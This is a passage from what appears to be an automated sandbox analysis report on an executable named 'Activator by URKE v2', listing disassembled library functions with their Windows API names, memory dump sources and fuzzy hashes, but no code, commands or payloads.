                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                  • Opcode ID: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                                                                                                  • Instruction ID: be8c956b6a08a2b51d62f97a7873e7b9d1f133e5b0a705710c36cfbdd3194766
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FF03C88B0960A82FE5476A565213F592845F84F40F884032890EC66C2DE3CA6805232
                                                                                                                                                                                                                                                  Function 00007FF7E5F20E5C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                                                                                                  • Opcode ID: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                                                                                                  • Instruction ID: 2624bb8f6435ac9deafb6859b7f73cfc082fd82e82c98c5a00b8baf4be9d1055
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71F05E8AB1964F85FB5476B158317F4A1884F88F61FC84236DC6ECA2C2DE3CA4C08137
                                                                                                                                                                                                                                                  Function 00007FF7E5EF42D0 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                  • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                                                                                                  • Instruction ID: 90bedf54369a1c90c3ae346a93beff645c2c6ff2cca0a95afab4f8724b82f060
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0D122A0964A85EB309B24E150378A660DB04F39FC84336DABC891D4DF38D9A18332

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00007FF7E5EFE91C Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                                                                                                                                                                                  • String ID: %ls$%s: %s
                                                                                                                                                                                                                                                  • API String ID: 2539828978-2259941744
                                                                                                                                                                                                                                                  • Opcode ID: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
                                                                                                                                                                                                                                                  • Instruction ID: a0bb99006198236361e32f69435ed31f9f292ca377847daf7f4f618eb20c2d87
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d3cbc19e4e1dbb22a2acefae036e62ad68edc13d54aabbef10823836ec3d9f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21B2B262A1868A41EA14BB25D5643BAE312AFC5B90FD04337E6DD8B7D6DE3CE150C321
                                                                                                                                                                                                                                                  Function 00007FF7E5F259E0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 1759834784-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                                                                                                  • Instruction ID: 3a01548f63ba91f47db8e3545e338d222726b8e721cd9e8fd50649294fa49b89
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9299a3169d015825bf4d3bc5b4bd651bd176d2d756bbc2b925d21ab17e7b8838
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B24BB6E081868BE724EE65D4607FDB791FB44B8CF905136DA09DBB84DF38E5048B11
                                                                                                                                                                                                                                                  Function 00007FF7E5EF72AC Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1693479884-0
                                                                                                                                                                                                                                                  • Opcode ID: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                                                                                                                                                                                                                                  • Instruction ID: 14647c2058f772a0b6df489014bfbd12a0000760f477df4bef05e7a695763d1d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5592b693c74ccad0e5d78d632396af68d872ce8b1fec77960f8407698a9532c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8A1F662F1575A40FF00EB79DA642BDA321AB44FE4BD04232DEAD9BBC5DE3CD0518261
                                                                                                                                                                                                                                                  Function 00007FF7E5F16940 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                                                                                  • Opcode ID: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                  • Instruction ID: b4602dc561350bc0ba8a562caf928b4b4aed3aae1e3c4db8fca1c24ec5ace1de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f39327fa42525bc33200ed161c8229643c86edd9f1335a814b99d0019b01ea8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2316376609B8586EB609F60E8603EDB365FB44B48F84443ADA4E87B95DF3CD548C720
                                                                                                                                                                                                                                                  Function 00007FF7E5F1AC68 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                  • Opcode ID: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                  • Instruction ID: 688fd4dd428b6896bfc33d25f6a97cb0c5b5dfa35b28ba20874ccd0b277c09fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2759f8db754f876dc0f97b654b135c0d6c98d8b2746f43aa6ee3cc8681b6d2d7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05318136608F8586DB609F25E8503EEB3A4FB88B54F900136EA8D87B99DF3CD5458B11
                                                                                                                                                                                                                                                  Function 00007FF7E5F22F24 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E5F22F54
                                                                                                                                                                                                                                                    • Part of subcall function 00007FF7E5F1AEC4: GetCurrentProcess.KERNEL32(00007FF7E5F2415D), ref: 00007FF7E5F1AEF1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                                  • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                  • Opcode ID: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                  • Instruction ID: 10ce4b871ee64208620e6035928fe1c678882b9c10a68dec1fcf9278fc80c90e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0397e87bc1f9fe8d1eb93a7313c01eb3b20dabc7e7d4e6101e5a9de111c5d93d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA51E5A6B15A9981EF10EF6298202E8A7A4FB44FD8F844533DE1D97B85DE3CD4418322
                                                                                                                                                                                                                                                  Function 00007FF7E5F25510 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1502251526-0
                                                                                                                                                                                                                                                  • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                  • Instruction ID: 2d4db9c00a8b4282e924d97212e55dc6fdb72c85f26c321b6c765f4d52902a0d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D1F776B1828987DB34DF15E1947AAB791F788B85F948135CB4E9BB44DE3CE801CB10
                                                                                                                                                                                                                                                  Function 00007FF7E5EF3BF8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C05
                                                                                                                                                                                                                                                  • FormatMessageW.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C39
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,00007FF7E5EFFD53), ref: 00007FF7E5EF3C63
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1365068426-0
                                                                                                                                                                                                                                                  • Opcode ID: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                  • Instruction ID: 7fc96bd462b3af7ca853b78776ea93af2f43c1c72364268c78fee3b31904e9a1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 684dc38ac55c5e82846154b96ca5d63968fe70dc8924e915fe5da19121ede087
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01A77160C74982D710AF12F59027AE351FB89FC4F944035EA8D87B49CF3CD1108721
                                                                                                                                                                                                                                                  Function 00007FF7E5F23130 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .
                                                                                                                                                                                                                                                  • API String ID: 0-248832578
                                                                                                                                                                                                                                                  • Opcode ID: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                                                                                                  • Instruction ID: 07e3d85020395d960d090b45135fd789020f01375a17a16e3c323af92f9f0987
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 235d398572f0be20e3fb8c6319951830835c2244ab5eef47411310ef9754f573
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93314DA5B0469945FB20AB22D8147F9EB91EB44FE4F448332DE6C87BC5CE3CD5018701
                                                                                                                                                                                                                                                  Function 00007FF7E5F29008 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                                                                                  • Opcode ID: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                                                                                                  • Instruction ID: df016b969620d8c5b62d3f5d696d8be4c5d32313026812fd52e0dd8754668273
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4849b446cfebff07557885922af6d4c071b7d011b782ff7bb17459a6eb955de
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66B18DB7600B888BEB15CF2AC9553AC7BA0F784F48F158822DA5D877A4CF39D491CB11
                                                                                                                                                                                                                                                  Function 00007FF7E5F0CA30 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
